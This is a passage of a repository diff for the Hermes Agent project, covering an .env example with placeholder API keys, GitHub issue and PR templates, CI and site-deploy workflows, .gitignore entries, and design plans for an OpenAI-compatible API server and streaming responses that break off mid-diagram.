# VOICE TRANSCRIPTION & OPENAI TTS
# =============================================================================
# Required for voice message transcription (Whisper) and OpenAI TTS voices.
# Uses OpenAI's API directly (not via OpenRouter).
# Named VOICE_TOOLS_OPENAI_KEY to avoid interference with OpenRouter.
# Get at: https://platform.openai.com/api-keys
VOICE_TOOLS_OPENAI_KEY=
# =============================================================================
# SLACK INTEGRATION
# =============================================================================
# Slack Bot Token - From Slack App settings (OAuth & Permissions)
# Get at: https://api.slack.com/apps
# SLACK_BOT_TOKEN=xoxb-...
# Slack App Token - For Socket Mode (App-Level Tokens in Slack App settings)
# SLACK_APP_TOKEN=xapp-...
# Slack allowed users (comma-separated Slack user IDs)
# SLACK_ALLOWED_USERS=
# WhatsApp (built-in Baileys bridge — run `hermes whatsapp` to pair)
# WHATSAPP_ENABLED=false
# WHATSAPP_ALLOWED_USERS=15551234567
# Email (IMAP/SMTP — send and receive emails as Hermes)
# For Gmail: enable 2FA → create App Password at https://myaccount.google.com/apppasswords
# EMAIL_ADDRESS=hermes@gmail.com
# EMAIL_PASSWORD=xxxx xxxx xxxx xxxx
# EMAIL_IMAP_HOST=imap.gmail.com
# EMAIL_IMAP_PORT=993
# EMAIL_SMTP_HOST=smtp.gmail.com
# EMAIL_SMTP_PORT=587
# EMAIL_POLL_INTERVAL=15
# EMAIL_ALLOWED_USERS=your@email.com
# EMAIL_HOME_ADDRESS=your@email.com
# Gateway-wide: allow ALL users without an allowlist (default: false = deny)
# Only set to true if you intentionally want open access.
# GATEWAY_ALLOW_ALL_USERS=false
# =============================================================================
# RESPONSE PACING
# =============================================================================
# Human-like delays between message chunks on messaging platforms.
# Makes the bot feel less robotic.
# HERMES_HUMAN_DELAY_MODE=off # off | natural | custom
# HERMES_HUMAN_DELAY_MIN_MS=800 # Min delay in ms (custom mode)
# HERMES_HUMAN_DELAY_MAX_MS=2500 # Max delay in ms (custom mode)
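In `custom` mode the delay is presumably a uniform draw between the two bounds; a sketch of what the pacing hook might do:

```python
import os
import random
import time

def human_delay() -> None:
    """Sleep a human-feeling interval between message chunks (no-op when mode is off)."""
    if os.environ.get("HERMES_HUMAN_DELAY_MODE", "off") == "off":
        return
    lo = int(os.environ.get("HERMES_HUMAN_DELAY_MIN_MS", "800"))
    hi = int(os.environ.get("HERMES_HUMAN_DELAY_MAX_MS", "2500"))
    time.sleep(random.uniform(lo, hi) / 1000.0)  # ms -> s
```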
# =============================================================================
# DEBUG OPTIONS
# =============================================================================
WEB_TOOLS_DEBUG=false
VISION_TOOLS_DEBUG=false
MOA_TOOLS_DEBUG=false
IMAGE_TOOLS_DEBUG=false
# =============================================================================
# CONTEXT COMPRESSION (Auto-shrinks long conversations)
# =============================================================================
# When conversation approaches model's context limit, middle turns are
# automatically summarized to free up space.
#
# Context compression is configured in ~/.hermes/config.yaml under compression:
# CONTEXT_COMPRESSION_ENABLED=true # Enable auto-compression (default: true)
# CONTEXT_COMPRESSION_THRESHOLD=0.85 # Compress at 85% of context limit
# Model is set via compression.summary_model in config.yaml (default: google/gemini-3-flash-preview)
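The trigger itself is just a ratio check against the model's context limit; illustratively (not the actual compression module):

```python
def should_compress(token_count: int, context_limit: int, threshold: float = 0.85) -> bool:
    """Compress once usage crosses threshold * context_limit."""
    return token_count >= context_limit * threshold

# A 200k-context model with the default 0.85 threshold starts compressing at 170k tokens:
assert should_compress(171_000, 200_000)
assert not should_compress(100_000, 200_000)
```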
# =============================================================================
# RL TRAINING (Tinker + Atropos)
# =============================================================================
# Run reinforcement learning training on language models using the Tinker API.
# Requires the rl-server to be running (from tinker-atropos package).
# Tinker API Key - RL training service
# Get at: https://tinker-console.thinkingmachines.ai/keys
TINKER_API_KEY=
# Weights & Biases API Key - Experiment tracking and metrics
# Get at: https://wandb.ai/authorize
WANDB_API_KEY=
# RL API Server URL (default: http://localhost:8080)
# Change if running the rl-server on a different host/port
# RL_API_URL=http://localhost:8080
# =============================================================================
# SKILLS HUB (GitHub integration for skill search/install/publish)
# =============================================================================
# GitHub Personal Access Token — for higher API rate limits on skill search/install
# Get at: https://github.com/settings/tokens (Fine-grained recommended)
# GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxx
# GitHub App credentials (optional — for bot identity on PRs)
# GITHUB_APP_ID=
# GITHUB_APP_PRIVATE_KEY_PATH=
# GITHUB_APP_INSTALLATION_ID=

.github/ISSUE_TEMPLATE/bug_report.yml (new file)

@@ -0,0 +1,144 @@
name: "🐛 Bug Report"
description: Report a bug — something that's broken, crashes, or behaves incorrectly.
title: "[Bug]: "
labels: ["bug"]
body:
- type: markdown
attributes:
value: |
Thanks for reporting a bug! Please fill out the sections below so we can reproduce and fix it quickly.
**Before submitting**, please:
- [ ] Search [existing issues](https://github.com/NousResearch/hermes-agent/issues) to avoid duplicates
- [ ] Update to the latest version (`hermes update`) and confirm the bug still exists
- type: textarea
id: description
attributes:
label: Bug Description
description: A clear description of what's broken. Include error messages, tracebacks, or screenshots if relevant.
placeholder: |
What happened? What did you expect to happen instead?
validations:
required: true
- type: textarea
id: reproduction
attributes:
label: Steps to Reproduce
description: Minimal steps to trigger the bug. The more specific, the faster we can fix it.
placeholder: |
1. Run `hermes chat`
2. Send the message "..."
3. Agent calls tool X
4. Error appears: ...
validations:
required: true
- type: textarea
id: expected
attributes:
label: Expected Behavior
description: What should have happened instead?
validations:
required: true
- type: textarea
id: actual
attributes:
label: Actual Behavior
description: What actually happened? Include full error output if available.
validations:
required: true
- type: dropdown
id: component
attributes:
label: Affected Component
description: Which part of Hermes is affected?
multiple: true
options:
- CLI (interactive chat)
- Gateway (Telegram/Discord/Slack/WhatsApp)
- Setup / Installation
- Tools (terminal, file ops, web, code execution, etc.)
- Skills (skill loading, skill hub, skill guard)
- Agent Core (conversation loop, context compression, memory)
- Configuration (config.yaml, .env, hermes setup)
- Other
validations:
required: true
- type: dropdown
id: platform
attributes:
label: Messaging Platform (if gateway-related)
description: Which platform adapter is affected?
multiple: true
options:
- N/A (CLI only)
- Telegram
- Discord
- Slack
- WhatsApp
- type: input
id: os
attributes:
label: Operating System
description: e.g. Ubuntu 24.04, macOS 15.2, Windows 11
placeholder: Ubuntu 24.04
validations:
required: true
- type: input
id: python-version
attributes:
label: Python Version
description: Output of `python --version`
placeholder: "3.11.9"
validations:
required: true
- type: input
id: hermes-version
attributes:
label: Hermes Version
description: Output of `hermes version`
placeholder: "2.1.0"
validations:
required: true
- type: textarea
id: logs
attributes:
label: Relevant Logs / Traceback
description: Paste any error output, traceback, or log messages. This will be auto-formatted as code.
render: shell
- type: textarea
id: root-cause
attributes:
label: Root Cause Analysis (optional)
description: |
If you've dug into the code and identified the root cause, share it here.
Include file paths, line numbers, and code snippets if possible. This massively speeds up fixes.
placeholder: |
The bug is in `gateway/run.py` line 949. `len(history)` counts session_meta entries
but `agent_messages` was built from filtered history...
- type: textarea
id: proposed-fix
attributes:
label: Proposed Fix (optional)
description: If you have a fix in mind (or a PR ready), describe it here.
placeholder: |
Replace `.get()` with `.pop()` on line 289 of `gateway/platforms/base.py`
to actually clear the pending message after retrieval.
- type: checkboxes
id: pr-ready
attributes:
label: Are you willing to submit a PR for this?
options:
- label: I'd like to fix this myself and submit a PR

.github/ISSUE_TEMPLATE/config.yml (new file)

@@ -0,0 +1,11 @@
blank_issues_enabled: true
contact_links:
  - name: 💬 Nous Research Discord
    url: https://discord.gg/NousResearch
    about: For quick questions, showcasing projects, sharing skills, and community chat.
  - name: 📖 Documentation
    url: https://github.com/NousResearch/hermes-agent/blob/main/README.md
    about: Check the README and docs before opening an issue.
  - name: 🤝 Contributing Guide
    url: https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md
    about: Read this before submitting a PR.

.github/ISSUE_TEMPLATE/feature_request.yml (new file)

@@ -0,0 +1,73 @@
name: "✨ Feature Request"
description: Suggest a new feature or improvement.
title: "[Feature]: "
labels: ["enhancement"]
body:
- type: markdown
attributes:
value: |
Thanks for the suggestion! Before submitting, please consider:
- **Is this a new skill?** Most capabilities should be [skills, not tools](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#should-it-be-a-skill-or-a-tool). If it's a specialized integration (crypto, NFT, niche SaaS), it belongs on the Skills Hub, not bundled.
- **Search [existing issues](https://github.com/NousResearch/hermes-agent/issues)** — someone may have already proposed this.
- type: textarea
id: problem
attributes:
label: Problem or Use Case
description: What problem does this solve? What are you trying to do that you can't today?
placeholder: |
I'm trying to use Hermes with [provider/platform/workflow] but currently
there's no way to...
validations:
required: true
- type: textarea
id: solution
attributes:
label: Proposed Solution
description: How do you think this should work? Be as specific as you can — CLI flags, config options, UI behavior.
placeholder: |
Add a `--foo` flag to `hermes chat` that enables...
Or: Add a config key `bar.baz` that controls...
validations:
required: true
- type: textarea
id: alternatives
attributes:
label: Alternatives Considered
description: What other approaches did you consider? Why is the proposed solution better?
- type: dropdown
id: type
attributes:
label: Feature Type
options:
- New tool
- New bundled skill
- CLI improvement
- Gateway / messaging improvement
- Configuration option
- Performance / reliability
- Developer experience (tests, docs, CI)
- Other
validations:
required: true
- type: dropdown
id: scope
attributes:
label: Scope
description: How big is this change?
options:
- Small (single file, < 50 lines)
- Medium (few files, < 300 lines)
- Large (new module or significant refactor)
- type: checkboxes
id: pr-ready
attributes:
label: Contribution
options:
- label: I'd like to implement this myself and submit a PR

.github/ISSUE_TEMPLATE/setup_help.yml (new file)

@@ -0,0 +1,100 @@
name: "🔧 Setup / Installation Help"
description: Having trouble installing or configuring Hermes? Ask here.
title: "[Setup]: "
labels: ["setup"]
body:
- type: markdown
attributes:
value: |
Sorry you're having trouble! Please fill out the details below so we can help.
**Quick checks first:**
- Run `hermes doctor` and include the output below
- Try `hermes update` to get the latest version
- Check the [README troubleshooting section](https://github.com/NousResearch/hermes-agent#troubleshooting)
- For general questions, consider the [Nous Research Discord](https://discord.gg/NousResearch) for faster help
- type: textarea
id: description
attributes:
label: What's Going Wrong?
description: Describe what you're trying to do and where it fails.
placeholder: |
I ran `hermes setup` and selected Nous Portal, but when I try to
start the gateway I get...
validations:
required: true
- type: textarea
id: steps
attributes:
label: Steps Taken
description: What did you do? Include the exact commands you ran.
placeholder: |
1. Ran the install script: `curl -fsSL ... | bash`
2. Ran `hermes setup` and chose "Quick setup"
3. Selected OpenRouter, entered API key
4. Ran `hermes chat` and got error...
validations:
required: true
- type: dropdown
id: install-method
attributes:
label: Installation Method
options:
- Install script (curl | bash)
- Manual clone + pip/uv install
- PowerShell installer (Windows)
- Docker
- Other
validations:
required: true
- type: input
id: os
attributes:
label: Operating System
placeholder: Ubuntu 24.04 / macOS 15.2 / Windows 11
validations:
required: true
- type: input
id: python-version
attributes:
label: Python Version
description: Output of `python --version` (or `python3 --version`)
placeholder: "3.11.9"
- type: input
id: hermes-version
attributes:
label: Hermes Version
description: Output of `hermes version` (if install got that far)
placeholder: "2.1.0"
- type: textarea
id: doctor-output
attributes:
label: Output of `hermes doctor`
description: Run `hermes doctor` and paste the full output. This will be auto-formatted.
render: shell
- type: textarea
id: error-output
attributes:
label: Full Error Output
description: Paste the complete error message or traceback. This will be auto-formatted.
render: shell
validations:
required: true
- type: textarea
id: tried
attributes:
label: What I've Already Tried
description: List any fixes or workarounds you've already attempted.
placeholder: |
- Ran `hermes update`
- Tried reinstalling with `pip install -e ".[all]"`
- Checked that OPENROUTER_API_KEY is set in ~/.hermes/.env

.github/PULL_REQUEST_TEMPLATE.md (new file)

@@ -0,0 +1,75 @@
## What does this PR do?
<!-- Describe the change clearly. What problem does it solve? Why is this approach the right one? -->
## Related Issue
<!-- Link the issue this PR addresses. If no issue exists, consider creating one first. -->
Fixes #
## Type of Change
<!-- Check the one that applies. -->
- [ ] 🐛 Bug fix (non-breaking change that fixes an issue)
- [ ] ✨ New feature (non-breaking change that adds functionality)
- [ ] 🔒 Security fix
- [ ] 📝 Documentation update
- [ ] ✅ Tests (adding or improving test coverage)
- [ ] ♻️ Refactor (no behavior change)
- [ ] 🎯 New skill (bundled or hub)
## Changes Made
<!-- List the specific changes. Include file paths for code changes. -->
-
## How to Test
<!-- Steps to verify this change works. For bugs: reproduction steps + proof that the fix works. -->
1.
2.
3.
## Checklist
<!-- Complete these before requesting review. -->
### Code
- [ ] I've read the [Contributing Guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md)
- [ ] My commit messages follow [Conventional Commits](https://www.conventionalcommits.org/) (`fix(scope):`, `feat(scope):`, etc.)
- [ ] I searched for [existing PRs](https://github.com/NousResearch/hermes-agent/pulls) to make sure this isn't a duplicate
- [ ] My PR contains **only** changes related to this fix/feature (no unrelated commits)
- [ ] I've run `pytest tests/ -q` and all tests pass
- [ ] I've added tests for my changes (required for bug fixes, strongly encouraged for features)
- [ ] I've tested on my platform: <!-- e.g. Ubuntu 24.04, macOS 15.2, Windows 11 -->
### Documentation & Housekeeping
<!-- Check all that apply. It's OK to check "N/A" if a category doesn't apply to your change. -->
- [ ] I've updated relevant documentation (README, `docs/`, docstrings) — or N/A
- [ ] I've updated `cli-config.yaml.example` if I added/changed config keys — or N/A
- [ ] I've updated `CONTRIBUTING.md` or `AGENTS.md` if I changed architecture or workflows — or N/A
- [ ] I've considered cross-platform impact (Windows, macOS) per the [compatibility guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#cross-platform-compatibility) — or N/A
- [ ] I've updated tool descriptions/schemas if I changed tool behavior — or N/A
## For New Skills
<!-- Only fill this out if you're adding a skill. Delete this section otherwise. -->
- [ ] This skill is **broadly useful** to most users (if bundled) — see [Contributing Guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#should-the-skill-be-bundled)
- [ ] SKILL.md follows the [standard format](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#skillmd-format) (frontmatter, trigger conditions, steps, pitfalls)
- [ ] No external dependencies that aren't already available (prefer stdlib, curl, existing Hermes tools)
- [ ] I've tested the skill end-to-end: `hermes --toolsets skills -q "Use the X skill to do Y"`
## Screenshots / Logs
<!-- If applicable, add screenshots or log output showing the fix/feature in action. -->

.github/workflows/deploy-site.yml (new file)

@@ -0,0 +1,60 @@
name: Deploy Site
on:
  push:
    branches: [main]
    paths:
      - 'website/**'
      - 'landingpage/**'
      - '.github/workflows/deploy-site.yml'
  workflow_dispatch:
permissions:
  pages: write
  id-token: write
concurrency:
  group: pages
  cancel-in-progress: false
jobs:
  build-and-deploy:
    runs-on: ubuntu-latest
    environment:
      name: github-pages
      url: ${{ steps.deploy.outputs.page_url }}
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: 20
          cache: npm
          cache-dependency-path: website/package-lock.json
      - name: Install dependencies
        run: npm ci
        working-directory: website
      - name: Build Docusaurus
        run: npm run build
        working-directory: website
      - name: Stage deployment
        run: |
          mkdir -p _site/docs
          # Landing page at root
          cp -r landingpage/* _site/
          # Docusaurus at /docs/
          cp -r website/build/* _site/docs/
          # CNAME so GitHub Pages keeps the custom domain between deploys
          echo "hermes-agent.nousresearch.com" > _site/CNAME
      - name: Upload artifact
        uses: actions/upload-pages-artifact@v3
        with:
          path: _site
      - name: Deploy to GitHub Pages
        id: deploy
        uses: actions/deploy-pages@v4

.github/workflows/tests.yml (new file)

@@ -0,0 +1,42 @@
name: Tests
on:
  push:
    branches: [main]
  pull_request:
    branches: [main]
# Cancel in-progress runs for the same PR/branch
concurrency:
  group: tests-${{ github.ref }}
  cancel-in-progress: true
jobs:
  test:
    runs-on: ubuntu-latest
    timeout-minutes: 10
    steps:
      - name: Checkout code
        uses: actions/checkout@v4
      - name: Install uv
        uses: astral-sh/setup-uv@v5
      - name: Set up Python 3.11
        run: uv python install 3.11
      - name: Install dependencies
        run: |
          uv venv .venv --python 3.11
          source .venv/bin/activate
          uv pip install -e ".[all,dev]"
      - name: Run tests
        run: |
          source .venv/bin/activate
          python -m pytest tests/ -q --ignore=tests/integration --tb=short -n auto
        env:
          # Ensure tests don't accidentally call real APIs
          OPENROUTER_API_KEY: ""
          OPENAI_API_KEY: ""
          NOUS_API_KEY: ""

.gitignore

@@ -1,32 +1,55 @@
/venv/
/_pycache/
hecate/
hecate-lib/
*.pyc*
__pycache__/
.venv/
.vscode/
.env
.env.local
.env.development.local
.env.test.local
.env.production.local
.env.development
.env.test
export*
__pycache__/model_tools.cpython-310.pyc
__pycache__/web_tools.cpython-310.pyc
logs/
data/
.pytest_cache/
tmp/
temp_vision_images/
hermes-*/*
examples/
tests/quick_test_dataset.jsonl
tests/sample_dataset.jsonl
run_datagen_kimik2-thinking.sh
run_datagen_megascience_glm4-6.sh
run_datagen_sonnet.sh
source-data/*
run_datagen_megascience_glm4-6.sh
/venv/
/_pycache/
*.pyc*
__pycache__/
.venv/
.vscode/
.env
.env.local
.env.development.local
.env.test.local
.env.production.local
.env.development
.env.test
export*
__pycache__/model_tools.cpython-310.pyc
__pycache__/web_tools.cpython-310.pyc
logs/
data/
.pytest_cache/
tmp/
temp_vision_images/
hermes-*/*
examples/
tests/quick_test_dataset.jsonl
tests/sample_dataset.jsonl
run_datagen_kimik2-thinking.sh
run_datagen_megascience_glm4-6.sh
run_datagen_sonnet.sh
source-data/*
run_datagen_megascience_glm4-6.sh
data/*
node_modules/
browser-use/
agent-browser/
# Private keys
*.ppk
*.pem
privvy*
images/
__pycache__/
hermes_agent.egg-info/
wandb/
testlogs
# CLI config (may contain sensitive SSH paths)
cli-config.yaml
# Skills Hub state (lives in ~/.hermes/skills/.hub/ at runtime, but just in case)
skills/.hub/
ignored/
.worktrees/
environments/benchmarks/evals/
# Release script temp files
.release_notes.md

.gitmodules

@@ -0,0 +1,6 @@
[submodule "mini-swe-agent"]
path = mini-swe-agent
url = https://github.com/SWE-agent/mini-swe-agent
[submodule "tinker-atropos"]
path = tinker-atropos
url = https://github.com/nousresearch/tinker-atropos

.plans/openai-api-server.md

@@ -0,0 +1,291 @@
# OpenAI-Compatible API Server for Hermes Agent
## Motivation
Every major chat frontend (Open WebUI 126k★, LobeChat 73k★, LibreChat 34k★,
AnythingLLM 56k★, NextChat 87k★, ChatBox 39k★, Jan 26k★, HF Chat-UI 8k★,
big-AGI 7k★) connects to backends via the OpenAI-compatible REST API with
SSE streaming. By exposing this endpoint, hermes-agent becomes instantly
usable as a backend for all of them — no custom adapters needed.
## What It Enables
```
┌──────────────────┐
│ Open WebUI       │──┐
│ LobeChat         │  │   POST /v1/chat/completions
│ LibreChat        │  ├──► Authorization: Bearer <key>   ┌─────────────────┐
│ AnythingLLM      │  │    {"messages": [...]}           │  hermes-agent   │
│ NextChat         │  │                                  │     gateway     │
│ Any OAI client   │──┘  ◄── SSE streaming response      │  (API server)   │
└──────────────────┘                                     └─────────────────┘
```
A user would:
1. Set `API_SERVER_ENABLED=true` in `~/.hermes/.env`
2. Run `hermes gateway` (API server starts alongside Telegram/Discord/etc.)
3. Point Open WebUI (or any frontend) at `http://localhost:8642/v1`
4. Chat with hermes-agent through any OpenAI-compatible UI
## Endpoints
| Method | Path | Purpose |
|--------|------|---------|
| POST | `/v1/chat/completions` | Chat with the agent (streaming + non-streaming) |
| GET | `/v1/models` | List available "models" (returns hermes-agent as a model) |
| GET | `/health` | Health check |
## Architecture
### Option A: Gateway Platform Adapter (recommended)
Create `gateway/platforms/api_server.py` as a new platform adapter that
extends `BasePlatformAdapter`. This is the cleanest approach because:
- Reuses all gateway infrastructure (session management, auth, context building)
- Runs in the same async loop as other adapters
- Gets message handling, interrupt support, and session persistence for free
- Follows the established pattern (like Telegram, Discord, etc.)
- Uses `aiohttp.web` (already a dependency) for the HTTP server
The adapter would start an `aiohttp.web.Application` server in `connect()`
and route incoming HTTP requests through the standard `handle_message()` pipeline.
### Option B: Standalone Component
A separate HTTP server class in `gateway/api_server.py` that creates its own
AIAgent instances directly. Simpler but duplicates session/auth logic.
**Recommendation: Option A** — fits the existing architecture, less code to
maintain, gets all gateway features for free.
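For concreteness, here is a minimal sketch of Option A. The `APIServerAdapter` name, the import path, and the exact `connect()`/`handle_message()` signatures are assumptions for illustration, not the final implementation:
```python
from aiohttp import web

from gateway.platforms.base import BasePlatformAdapter  # import path assumed


class APIServerAdapter(BasePlatformAdapter):
    """Illustrative adapter: serve the OpenAI endpoints inside the gateway loop."""

    async def connect(self):
        app = web.Application()
        app.router.add_post("/v1/chat/completions", self._chat_completions)
        app.router.add_get("/health", self._health)
        runner = web.AppRunner(app)
        await runner.setup()
        await web.TCPSite(runner, "127.0.0.1", 8642).start()

    async def _health(self, request: web.Request) -> web.Response:
        return web.json_response({"status": "ok"})

    async def _chat_completions(self, request: web.Request) -> web.Response:
        payload = await request.json()
        # Route through the standard gateway pipeline; the real handler would
        # also apply auth, session lookup, and streaming (signature assumed).
        text = await self.handle_message(payload.get("messages", []))
        return web.json_response({
            "object": "chat.completion",
            "choices": [{
                "index": 0,
                "message": {"role": "assistant", "content": text},
                "finish_reason": "stop",
            }],
        })
```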
## Request/Response Format
### Chat Completions (non-streaming)
```
POST /v1/chat/completions
Authorization: Bearer hermes-api-key-here
Content-Type: application/json
{
  "model": "hermes-agent",
  "messages": [
    {"role": "system", "content": "You are a helpful assistant."},
    {"role": "user", "content": "What files are in the current directory?"}
  ],
  "stream": false,
  "temperature": 0.7
}
```
Response:
```json
{
  "id": "chatcmpl-abc123",
  "object": "chat.completion",
  "created": 1710000000,
  "model": "hermes-agent",
  "choices": [{
    "index": 0,
    "message": {
      "role": "assistant",
      "content": "Here are the files in the current directory:\n..."
    },
    "finish_reason": "stop"
  }],
  "usage": {
    "prompt_tokens": 50,
    "completion_tokens": 200,
    "total_tokens": 250
  }
}
```
### Chat Completions (streaming)
Same request with `"stream": true`. Response is SSE:
```
data: {"id":"chatcmpl-abc123","object":"chat.completion.chunk","choices":[{"index":0,"delta":{"role":"assistant"},"finish_reason":null}]}
data: {"id":"chatcmpl-abc123","object":"chat.completion.chunk","choices":[{"index":0,"delta":{"content":"Here "},"finish_reason":null}]}
data: {"id":"chatcmpl-abc123","object":"chat.completion.chunk","choices":[{"index":0,"delta":{"content":"are "},"finish_reason":null}]}
data: {"id":"chatcmpl-abc123","object":"chat.completion.chunk","choices":[{"index":0,"delta":{},"finish_reason":"stop"}]}
data: [DONE]
```
### Models List
```
GET /v1/models
Authorization: Bearer hermes-api-key-here
```
Response:
```json
{
  "object": "list",
  "data": [{
    "id": "hermes-agent",
    "object": "model",
    "created": 1710000000,
    "owned_by": "hermes-agent"
  }]
}
```
## Key Design Decisions
### 1. Session Management
The OpenAI API is stateless — each request includes the full conversation.
But hermes-agent sessions have persistent state (memory, skills, tool context).
**Approach: Hybrid**
- Default: Stateless. Each request is independent. The `messages` array IS
the conversation. No session persistence between requests.
- Opt-in persistent sessions via `X-Session-ID` header. When provided, the
server maintains session state across requests (conversation history,
  memory context, tool state). This enables richer agent behavior (see the curl example below).
- The session ID also enables interrupt support — a subsequent request with
the same session ID while one is running triggers an interrupt.
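To make the hybrid concrete, both modes hit the same endpoint; only the header differs (the session ID value here is arbitrary):
```bash
# Stateless (default): the messages array is the whole conversation
curl -s http://localhost:8642/v1/chat/completions \
  -H "Authorization: Bearer $API_SERVER_KEY" \
  -H "Content-Type: application/json" \
  -d '{"model": "hermes-agent", "messages": [{"role": "user", "content": "hi"}]}'

# Opt-in persistent session: same call plus the X-Session-ID header
curl -s http://localhost:8642/v1/chat/completions \
  -H "Authorization: Bearer $API_SERVER_KEY" \
  -H "X-Session-ID: my-project" \
  -H "Content-Type: application/json" \
  -d '{"model": "hermes-agent", "messages": [{"role": "user", "content": "continue"}]}'
```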
### 2. Streaming
The agent's `run_conversation()` is synchronous and returns the full response.
For real SSE streaming, we need to emit chunks as they're generated.
**Phase 1 (MVP):** Run agent in a thread, return the complete response as
a single SSE chunk + `[DONE]`. This works with all frontends — they just see
a fast single-chunk response. Not true streaming but functional.
**Phase 2:** Add a response callback to AIAgent that emits text chunks as the
LLM generates them. The API server captures these via a queue and streams them
as SSE events. This gives real token-by-token streaming.
**Phase 3:** Stream tool execution progress too — emit tool call/result events
as the agent works, giving frontends visibility into what the agent is doing.
### 3. Tool Transparency
Two modes:
- **Opaque (default):** Frontends see only the final response. Tool calls
happen server-side and are invisible. Best for general-purpose UIs.
- **Transparent (opt-in via header):** Tool calls are emitted as OpenAI-format
tool_call/tool_result messages in the stream. Useful for agent-aware frontends.
### 4. Authentication
- Bearer token via `Authorization: Bearer <key>` header
- Token configured via `API_SERVER_KEY` env var
- Optional: allow unauthenticated local-only access (127.0.0.1 bind)
- Follows the same pattern as other platform adapters (middleware sketch below)
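A minimal sketch of that check as `aiohttp` middleware (the function name and the open `/health` exemption are assumptions):
```python
import os

from aiohttp import web


@web.middleware
async def bearer_auth(request: web.Request, handler):
    """Reject any request that doesn't carry the configured bearer key."""
    if request.path != "/health":  # keep the health check unauthenticated
        expected = os.getenv("API_SERVER_KEY", "")
        supplied = request.headers.get("Authorization", "").removeprefix("Bearer ").strip()
        if not expected or supplied != expected:
            return web.json_response({"error": "unauthorized"}, status=401)
    return await handler(request)
```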
### 5. Model Mapping
Frontends send `"model": "hermes-agent"` (or whatever). The actual LLM model
used is configured server-side in config.yaml. The API server maps any
requested model name to the configured hermes-agent model.
Optionally, allow model passthrough: if the frontend sends
`"model": "anthropic/claude-sonnet-4"`, the agent uses that model. Controlled
by a config flag.
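A sketch of the mapping rule (function name and signature are illustrative; `allow_model_override` is the config flag defined below):
```python
def resolve_model(requested: str, api_cfg: dict, configured_model: str) -> str:
    """Map the client's requested model name onto the server-side model."""
    if api_cfg.get("allow_model_override") and requested:
        return requested         # passthrough, e.g. "anthropic/claude-sonnet-4"
    return configured_model      # otherwise ignore the alias ("hermes-agent")
```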
## Configuration
```yaml
# In config.yaml
api_server:
  enabled: true
  port: 8642
  host: "127.0.0.1"            # localhost only by default
  key: "your-secret-key"       # or via API_SERVER_KEY env var
  allow_model_override: false  # let clients choose the model
  max_concurrent: 5            # max simultaneous requests
```
Environment variables:
```bash
API_SERVER_ENABLED=true
API_SERVER_PORT=8642
API_SERVER_HOST=127.0.0.1
API_SERVER_KEY=your-secret-key
```
## Implementation Plan
### Phase 1: MVP (non-streaming) — PR
1. `gateway/platforms/api_server.py` — new adapter
   - aiohttp.web server with endpoints:
     - `POST /v1/chat/completions` — Chat Completions API (universal compat)
     - `POST /v1/responses` — Responses API (server-side state, tool preservation)
     - `GET /v1/models` — list available models
     - `GET /health` — health check
   - Bearer token auth middleware
   - Non-streaming responses (run agent, return full result)
   - Chat Completions: stateless, messages array is the conversation
   - Responses API: server-side conversation storage via previous_response_id
     - Store full internal conversation (including tool calls) keyed by response ID
     - On subsequent requests, reconstruct full context from stored chain
   - Frontend system prompt layered on top of hermes-agent's core prompt
2. `gateway/config.py` — add `Platform.API_SERVER` enum + config
3. `gateway/run.py` — register adapter in `_create_adapter()`
4. Tests in `tests/gateway/test_api_server.py`
### Phase 2: SSE Streaming
1. Add response streaming to both endpoints
   - Chat Completions: `choices[0].delta.content` SSE format
   - Responses API: semantic events (`response.output_text.delta`, etc.)
   - Run agent in thread, collect output via callback queue
   - Handle client disconnect (cancel agent)
2. Add `stream_callback` parameter to `AIAgent.run_conversation()`
### Phase 3: Enhanced Features
1. Tool call transparency mode (opt-in)
2. Model passthrough/override
3. Concurrent request limiting
4. Usage tracking / rate limiting
5. CORS headers for browser-based frontends
6. GET /v1/responses/{id} — retrieve stored response
7. DELETE /v1/responses/{id} — delete stored response
## Files Changed
| File | Change |
|------|--------|
| `gateway/platforms/api_server.py` | NEW — main adapter (~300 lines) |
| `gateway/config.py` | Add Platform.API_SERVER + config (~20 lines) |
| `gateway/run.py` | Register adapter in _create_adapter() (~10 lines) |
| `tests/gateway/test_api_server.py` | NEW — tests (~200 lines) |
| `cli-config.yaml.example` | Add api_server section |
| `README.md` | Mention API server in platform list |
## Compatibility Matrix
Once implemented, hermes-agent works as a drop-in backend for:
| Frontend | Stars | How to Connect |
|----------|-------|---------------|
| Open WebUI | 126k | Settings → Connections → Add OpenAI API, URL: `http://localhost:8642/v1` |
| NextChat | 87k | BASE_URL env var |
| LobeChat | 73k | Custom provider endpoint |
| AnythingLLM | 56k | LLM Provider → Generic OpenAI |
| Oobabooga | 42k | Already a backend, not a frontend |
| ChatBox | 39k | API Host setting |
| LibreChat | 34k | librechat.yaml custom endpoint |
| Chatbot UI | 29k | Custom API endpoint |
| Jan | 26k | Remote model config |
| AionUI | 18k | Custom API endpoint |
| HF Chat-UI | 8k | OPENAI_BASE_URL env var |
| big-AGI | 7k | Custom endpoint |

.plans/streaming-support.md

@@ -0,0 +1,705 @@
# Streaming LLM Response Support for Hermes Agent
## Overview
Add token-by-token streaming of LLM responses across all platforms. When enabled,
users see the response typing out live instead of waiting for the full generation.
Streaming is opt-in via config, defaults to off, and all existing non-streaming
code paths remain intact as the default.
## Design Principles
1. **Feature-flagged**: `streaming.enabled: true` in config.yaml. Off by default.
When off, all existing code paths are unchanged — zero risk to current behavior.
2. **Callback-based**: A simple `stream_callback(text_delta: str)` function injected
into AIAgent. The agent doesn't know or care what the consumer does with tokens.
3. **Graceful degradation**: If the provider doesn't support streaming, or streaming
fails for any reason, silently fall back to the non-streaming path.
4. **Platform-agnostic core**: The streaming mechanism in AIAgent works the same
regardless of whether the consumer is CLI, Telegram, Discord, or the API server.
---
## Architecture
```
                       stream_callback(delta)
┌─────────────┐     ┌─────────────▼──────────────┐
│   LLM API   │     │       queue.Queue()        │
│  (stream)   │───► │ thread-safe bridge between │
│             │     │  agent thread & consumer   │
└─────────────┘     └─────────────┬──────────────┘
                   ┌──────────────┼──────────────┐
                   │              │              │
             ┌─────▼─────┐  ┌─────▼─────┐  ┌─────▼─────┐
